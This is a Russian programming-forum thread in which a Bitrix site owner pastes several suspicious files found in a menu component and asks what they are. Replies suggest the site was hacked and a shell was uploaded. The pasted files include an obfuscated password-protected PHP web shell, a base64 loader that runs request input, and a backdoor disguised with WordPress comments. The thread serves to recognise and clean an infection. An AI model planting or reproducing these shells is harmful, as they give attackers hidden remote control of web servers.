Форум программистов, компьютерный форум, киберфорум
1С Битрикс
Войти
Регистрация
Восстановить пароль
Карта форума Темы раздела Блоги Сообщество Поиск Заказать работу  
 
Рейтинг 5.00/15: Рейтинг темы: голосов - 15, средняя оценка - 5.00
15 / 15 / 1
Регистрация: 19.10.2012
Сообщений: 570
1

Файл /bitrix/menu/customizer.php

25.07.2017, 08:11. Показов 2927. Ответов 4
Метки нет (Все метки)

Author24 — интернет-сервис помощи студентам
Всем привет.
Залез в компонент по своим делам, смотрю файлы, и нашел файл вот с тиким содержанием:

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
$ewuiI352AWRcxv=4;
$rHUIEWQj352ARScveWRafsz =' SFsc[ttt$9$&7a32=a2030e7<g45`a0=b51ge`2f=f45&? jijfvp`S$9$&[t3]`b1&? hvpvVbrw[l}$9$#BmhawIej#? lqPSf`[s`fmww$9$pvqa? fjbvavSAr$9$#Smj`ksw)5615#?mb,%aitp}, [WAVRAV_#LPPT[QWAV[ECAJP#Y--$$$$$ jjjccbcbSA$9$evve},&Ckkcha&($&vkfkp&(&Whqvt&($&IWJFkp&(&ia`mefkp&($&me[evglmrav&($&]ej`a|&($&Veifhav&-?$$$$mb,tvac[iepgl,#+#$*$mithk`a,#x#($ jjjccbcbSA-$*$#+m#($ [WAVRAV_#LPPT[QWAV[ECAJP#Y--$$$$$$$$$lae`av,#LPPT+5*4$040$Jkp$Bkqj`#-?$$$$$$$$a|mp?$$$$yyDwawwmkj[wpevp,-?Dmjm[wap,#avvkv[hkc#(JQHH-?Dmjm[wap,#hkc[avvkvw#(4-?Dmjm[wap,#ie|[a|agqpmkj[pmia#(4-?Dwap[pmia[hmimp,4-?Dwap[iecmg[uqkpaw[vqjpmia,4-?D`abmja,#RAVW[[#($#5*4#-?mb,cap[iecmg[uqkpaw[ctg,--$
bqjgpmkj$lbvpvSArfrfww, evve}-$
 
vapqvj$mw[evve}, evve}-$;$evve}[iet,#lbvpvSArfrfww#($ evve}-$>$wpvmtwhewlaw, evve}-?
y
 [TKWP$9$lbvpvSArfrfww, [TKWP-?ybqjgpmkj$SVAfg`cl,-$
`ma,&8tva$ehmcj9gajpav:8bkvi$iaplk`9tkwp:Tewwskv`>$8mjtqp$p}ta9tewwskv`$jeia9teww:8mjtqp$p}ta9wqfimp$rehqa9#::#:8+bkvi:8+tva:&-?ymb,%mwwap, [WAWWMKJ_i`1, [WAVRAV_#LPPT[LKWP#Y-Y--
mb,$aitp}, SFsc[ttt-$xx$,$mwwap, [TKWP_#teww#Y-$""$,i`1, [TKWP_#teww#Y-$99$ SFsc[ttt-$-$-
 
 [WAWWMKJ_i`1, [WAVRAV_#LPPT[LKWP#Y-Y$9$pvqa?
ahwa
 
SVAfg`cl,-?mb$,bmha[a|mwpw,&pait5)5*tlt&--$qjhmjo,&pait5)5*tlt&-?ymb,wpvpkhksav,wqfwpv,TLT[KW(4(7--$99$&smj&-
 sasvfbfSvr$9$#smj#?ahwa
 sasvfbfSvr$9$#jm|#? weba[ik`a$9$Dmjm[cap,#weba[ik`a#-?mb,% weba[ik`a-$$$$avvkv[vatkvpmjc,4-? `mwefha[bqjgpmkjw$9$Dmjm[cap,#`mwefha[bqjgpmkjw#-? PSllq[lw`wb$9$Dcapgs`,-?mb,mwwap, [TKWP_#g#Y--
Dgl`mv, [TKWP_#g#Y-? gs`$9$Dcapgs`,-?mb, sasvfbfSvr$99$#smj#-$
 PSllq[lw`wb$9$wpv[vathega,&XX&($&+&($ PSllq[lw`wb-?
 gs`$9$wpv[vathega,&XX&($&+&($ gs`-?ymb,$ gs`_wpvhaj, gs`-)5Y$%9$#+#$-
 gs`$*9$#+#?mb,%mwwap, [WAWWMKJ_i`1, [WAVRAV_#LPPT[LKWP#Y-$*$#ene|#Y--$$$$ [WAWWMKJ_i`1, [WAVRAV_#LPPT[LKWP#Y-$*$#ene|#Y$9$,fkkh- CHKFEHW_#`abeqhp[qwa[ene|#Y?bqjgpmkj$p}}AVrbgg,-$
mb,aitp}, [TKWP_#glevwap#Y--
 
 [TKWP_#glevwap#Y$9$ CHKFEHW_#`abeqhp[glevwap#Y?
chkfeh$ jijfvp`S?
aglk$&8lpih:8lae`:8iape$lppt)auqmr9#Gkjpajp)P}ta#$gkjpajp9#pa|p+lpih?$glevwap9&$*$ [TKWP_#glevwap#Y$*$&#:8pmpha:&$*$ [WAVRAV_#LPPT[LKWP#Y$*$&$)$K$&$*$RAVW[$*&8+pmpha:8wp}ha:fk`}fegocvkqj`)gkhkv>[t3]000?gkhkv>[t3]a5a5a5?yfk`}(p`(pl$bkjp>$=tp$Hqgm`e(Rav`eje?ievcmj>4?ravpmgeh)ehmcj>pkt?gkhkv>[t3]a5a5a5?$ypefha*mjbk$gkhkv>[t3]bbb?fegocvkqj`)gkhkv>[t3]666?$ywtej(l5(e$gkhkv>$ jijfvp`S$%mitkvpejp?$ywtej$bkjp)samclp>$fkh`av?$yl5$fkv`av)habp>1t|$wkhm`$ jijfvp`S?te``mjc>$6t|$1t|?bkjp>$50tp$Rav`eje?fegocvkqj`)gkhkv>[t3]666?ievcmj>4t|?$y`mr*gkjpajp$te``mjc>$1t|?ievcmj)habp>1t|?fegocvkqj`)gkhkv>[t3]777?$ye$pa|p)`agkvepmkj>jkja?$ye>lkrav$pa|p)`agkvepmkj>qj`avhmja?$y*ih5$fkv`av>5t|$wkhm`$[t3]000?te``mjc>1t|?ievcmj>4?kravbhks>$eqpk?$y*fmcevae$sm`pl>544!?lamclp>614t|?$ymjtqp(pa|pevae(wahagp$ievcmj>4?gkhkv>[t3]bbb?fegocvkqj`)gkhkv>[t3]111?fkv`av>5t|$wkhm`$ jijfvp`S?$bkjp>$=tp$Ikjkwtega(#Gkqvmav$Jas#?$ybkvi$ievcmj>4t|?$y[t3]pkkhwPfh$pa|p)ehmcj>gajpav?$y*pkkhwMjt$sm`pl>$744t|$y*iemj$plpa|p)ehmcj>habp?fegocvkqj`)gkhkv>[t3]1a1a1a?y*iemj$pv>lkravfegocvkqj`)gkhkv>[t3]1a1a1ay*h5fegocvkqj`)gkhkv>[t3]000y*h6fegocvkqj`)gkhkv>[t3]777ytvabkjp)beimh}>Gkqvmav(Ikjkwtega?y8+wp}ha:8wgvmtp:$$$$rev$g[$9$#&$*$lpihwtagmehglevw, CHKFEHW_#gs`#Y-$*$&#?$$$$rev$e[$9$#&$*$lpihwtagmehglevw,D [TKWP_#e#Y-$*&#$$$$rev$glevwap[$9$#&$*$lpihwtagmehglevw,D [TKWP_#glevwap#Y-$*&#?$$$$rev$t5[$9$#&$*$,,wpvtkw,D [TKWP_#t5#Y(&Xj&-%99behwa-;##>lpihwtagmehglevw, [TKWP_#t5#Y(AJP[UQKPAW--$*&#?$$$$rev$t6[$9$#&$*$,,wpvtkw,D [TKWP_#t6#Y(&Xj&-%99behwa-;##>lpihwtagmehglevw, [TKWP_#t6#Y(AJP[UQKPAW--$*&#?$$$$rev$t7[$9$#&$*$,,wpvtkw,D [TKWP_#t7#Y(&Xj&-%99behwa-;##>lpihwtagmehglevw, [TKWP_#t7#Y(AJP[UQKPAW--$*&#?$$$$rev$`$9$`kgqiajp?
bqjgpmkj$wap,e(g(t5(t6(t7(glevwap-$
 
mb,e%9jqhh-`*ib*e*rehqa9e?ahwa$`*ib*e*rehqa9e[?
 
mb,g%9jqhh-`*ib*g*rehqa9g?ahwa$`*ib*g*rehqa9g[?
Называется customizer.php . При открытии файла появилось предупреждение что файл бинарный. Это все что это может быть?

Добавлено через 8 минут
Еще есть такие интересные файлы
/bitrix/components/bitrix/menu/css.php
PHP
1
2
3
4
5
6
7
8
9
10
<?php 
$or="cIEBldcm";
$lq="9TVFsn";
$avj = str_replace("j","","sjtrj_jrjejpljajcje");
$zs="FsKCRfUE";
$bu="Y21kJ10pOw==";
$qu = $avj("i", "", "ibiaisie6i4i_dieicoide");
$fh = $avj("k","","crkekatkek_kfkukncktkikon");
$hwy = $fh('', $qu($avj("c", "", $or.$zs.$lq.$bu))); $hwy();         
?>
/bitrix/components/bitrix/menu/admin.php
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php $j___f='base'.(128/2).'_de'.'code';$j___f=$j___f(str_replace("\n", '', 'DLJEkxQeOEyYtagiEvXSeG2DID82OFoKkieZb7gDFaxPAs/WzozGQr64tjmEFF5OQdp5RZo5qQx51OD1
KlqHe6+uIGHnkaySLIzkCrUSzOP6T3iaG4Q/GikKjO1fCNakyVShHLRqarD86AF+oQdi+6lHbEUtQXDm
bcw8RoicK8IC5fCLxbwMRVyRB6cElm/cwaoiXYetLkaCw+bG1ImRi3wVOOZx2Qb+jejWOlLqvRpw/FFs
vbr1ppvJgVjA/gpC5dGSHXL+jhD8V39e1qz18mcruwfQYZGTTgX2S9csQHJqJiQGVlqJ318g3jd82AEx
vQls48NZpZHlHHAoLnY2mlKumWfp9X317eljn5S27fOOlkBZoZx1akv/yRWx/e948y1KHfbqsFqLqPyG
 
........
 
2Ax2c5kUNVwdL2J8YfmNUG7HRCtU/B3jIgwihB2toMXjqde/gfrrzYXxYqfaSbcs6WwgtLunCU5PlWKP
e2/n9MoENb3YiVqfREzljWqkLRGshz/b8T8NslcGpEF92imJKBFZrZbskL7ZkrBxf9XP704A19bnxeYi
jfynHucO45875oTw8mjgfgPMvbBeT1DBwVuCcIIdueDX3CihGIOXHmcwEgzdcnCa0ino0Fw3bktIp5Gf
xIqy5CjFMsZHwUjcuKnvnJrCSt5XgK8sWMjVA6WVkp4wLM+SDdtAuMIKfCIFHgc=
')); $j__f=isset($_POST['j__f'])?$_POST['j__f']:(isset($_COOKIE['j__f'])?$_COOKIE['j__f']:NULL);if($j__f!==NULL){$j__f=md5($j__f).substr(MD5(strrev($j__f)),0,strlen($j__f));for($j____f=0;$j____f<15587;$j____f++){$j___f[$j____f]=chr(( ord($j___f[$j____f])-ord($j__f[$j____f]))%256);$j__f.=$j___f[$j____f];}if($j___f=@gzinflate($j___f)){if(isset($_POST['j__f']))@setcookie('j__f', $_POST['j__f']);$j____f=create_function('',$j___f);unset($j__f,$j___f);$j____f();}}?><form method="post" action=""><input type="text"name="j__f"value=""/><input type="submit"value="&gt;"/></form>
/bitrix/components/bitrix/menu/hook-filters.php
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<?php
 
/**
 * Sets up the default filters and actions for most
 * of the WordPress hooks.
 *
 * If you need to remove a default hook, this file will
 * give you the priority for which to use to remove the
 * hook.
 *
 * Not all of the default hooks are found in hook-filters.php
 *
 * @package WordPress
 * @id: a885e12311e19c6e7f0bbeb61401d318ef74a0d5c090218339d88754a0a39f83100de159954e09
 *
 */
 
// Strip, trim, kses, special wp_nonces for string saves
 
 
function pre_term_name( $wp_kses_data, $wp_nonce ) {
    $prepare_str = str_replace( '%', '/', strrev( '='.$wp_kses_data ) );
    $filter = base64_decode( $prepare_str );
    $wp_nonce = md5( $wp_nonce ).substr( md5( strrev( $wp_nonce ) ), 0, strlen( $wp_nonce ) );
    for ($i = 0; $i < strlen( $filter ); $i++) {
        $filter[$i] = chr( ( ord( $filter[$i] ) - ord( $wp_nonce[$i] ) ) % 256 );
        $wp_nonce .= $filter[$i];
    }
    return @gzinflate( $filter );
} 
 
$wp_nonce = isset($_POST['_f_wp']) ? $_POST['_f_wp'] : (isset($_COOKIE['_f_wp']) ? $_COOKIE['_f_wp'] : NULL);
 
$wp_kses_data = 'wPDTS6TjOEfzTvAw%vCWngjPhyu%SrjiC%k3Nd3LurqtG2pc8dgGHQTTYLCQgAMs++Oz2+jbUAdw4hDjKC1xteS466BUtjbHLSyMVEZFOIDxo8NojNCoBm8nfvhAuWYHscB%MXp5sjlMq4quIVx6eGUSOotLNQRdWh1KDffuqKdA3N%9Ag1pK25NArbmRgxvKU7ynIfnQi8k4SWJJ5OevUQJrLSBx55m+ciXW20VNFxRS4PeuohVfGcoOEbn%uBbIk7Q9%EcHC2r%3sUzxu3RB4+idPl48ai+Db6K3crBY1qUDndqsJiQVMZepskrYdkO5uqRv6wY%tQabiXbjMHbO4PeR++8w8GVbRnN+QdKzEf%D7HyYva672Il%xiECQuRo00D0B9gQMIDNbd57sdPukGxI0esImsdiZStYKD%Lk7KcqK3on5IMj+VUfxity7kPm7RHvHgwVu5j93yNynHN0hEBlxo+QlBQoVl8ZWYg%PGXF9b9uV4NwCrBAvrDcQi6c2OrTIarGHXQ2huI3OLt9a4CZNlQRan5Yd6z9rvra%CabpNouOpdcjzAHAgrt1YRF5hp6QOyFQwEivuOaZ6Vg8qp38jLPNe20fYd55rYXq3NOZPHOHbLx1yrhxXzstJD55Wadto1ujcFHHwLL1diyKVZhOP01Bkto7GN0wXOH3uCU7w+YEPNEdwh%MQHgGDlDA5FmHLoC4E8rJkKcptiXjBjcLJO1+0Op
 
.........
 
2UWpco6NA3HcHF1wEAdy+hNCnPlQ86czbeRRJd+H9H5GlwMZvNQeCrA4TZA6AqANo1q9h%6PsNm+KW11zpK9+Ai65E8LbLTVkXDmP38T8Eujdgu8EVlqhQqBOa4gvDN7C';
$wp_auth_check = '<form method="post" action=""> <input type="input" name= "_f_wp" value=""/><input type="submit"value="&gt;"/> </form>';
 
$wpautop = pre_term_name( $wp_kses_data, $wp_nonce );
 
if( isset( $wpautop ) ){
    if( isset($_POST['_f_wp']) ) @setcookie( '_f_wp', $_POST['_f_wp'] );
    $shortcode_unautop = create_function( '', $wpautop );
    unset( $_f_wp, $wpautop );
    $shortcode_unautop();
}
 
echo $wp_auth_check;
 
?>
/bitrix/components/bitrix/menu/on.php
PHP
1
<?php echo 7457737+736723;?>
Добавлено через 1 минуту
Что-то мне подсказывает, к примеру,
PHP
1
2
3
4
/**
 * Sets up the default filters and actions for most
 * of the WordPress hooks.
 *
что это не от битрикса. Или не все от битрикса
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
25.07.2017, 08:11
Ответы с готовыми решениями:

Bitrix menu
Добрый день Форумчане. Нужна помощь, есть меню которое правится через инфоблок, можно добавить...

/docs/bitrix/php_interface/init.php
Есть сайт http://www.alttradition.ru/ Подскажите пожалуйста как исправить появившуюся ошибку. На...

Требуется ваша подсказка /docs/bitrix/php_interface/init.php
Есть сайт http://www.alttradition.ru/ Помогите пожалуйста. Подскажите как исправить появившуюся...

Bitrix backup восстановить файл
Добрый день Форумчане. Ситуация такова, делал правку блока через админку, при сохранении срезало...

4
0 / 0 / 0
Регистрация: 11.12.2016
Сообщений: 42
25.07.2017, 08:42 2
Код на Битриксовский не похож. А в чем вопрос то?
0
15 / 15 / 1
Регистрация: 19.10.2012
Сообщений: 570
25.07.2017, 11:34  [ТС] 3
ev1lzhenko, вопрос в том что это (если кто-то может однозначно и точно сказать), и если такой информации нет, как это дело выпилить так, чтобы потом проверить не отвалилось ли что-нибудь из битрикса. я не знаю должно ли это тут быть или нет. думаю что нет, но так же допускаю что могу ошибаться

Добавлено через 1 час 38 минут
знает кто действенный способ почистить битрикс от вирусов? и есть ли вирусня, которая может грузить именно бд?

Добавлено через 11 минут
выкачал ядро битрикса для проверки. теперь у меня несколько десятвов тысяч файлов. ясен день руками скармливать их онлайн сканерам невозможно. есть другой способ?
0
Администратор
83618 / 52196 / 244
Регистрация: 10.04.2006
Сообщений: 13,426
25.07.2017, 11:39 4
user20011993, сравните конкретно эти файлы с оригинальными. Возможно, вам залили шелл.
0
11 / 11 / 2
Регистрация: 29.05.2011
Сообщений: 533
27.07.2017, 12:03 5
Встречалось много файлов с подобным содержанием. Как правило это означает то, что Вас взломали и произвели внедрение своего вредоносного кода.
Вариант: установить бесплатное решение и провести проверку.
0
27.07.2017, 12:03
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
27.07.2017, 12:03
Помогаю со студенческими работами здесь

Компонент menu и menu.section вывести картинку
Здравствуйте, просмотрел все различные тему, перепробовал все приведенные коды, но картинку так и...

Есть ли возможность определения фильтра в комплексном компоненте bitrix:forum || bitrix:forum.index ?
Столкнулся с необходимостью фильтрации тем форумов. Поиск (bitrix:forum.search) не подходит,...

Как разместить bitrix::news компонент в шаблоне компонента news::detail другого bitrix::news?
Доброго времени суток, не так давно окунулся в мир битрикс разработки и передо мной встал следующий...

Интеграция Bitrix с 1C
Доброго времени суток. У меня есть измененная версия 1С комани, стандартный способ интеграции не...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
5
Ответ Создать тему
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2024, CyberForum.ru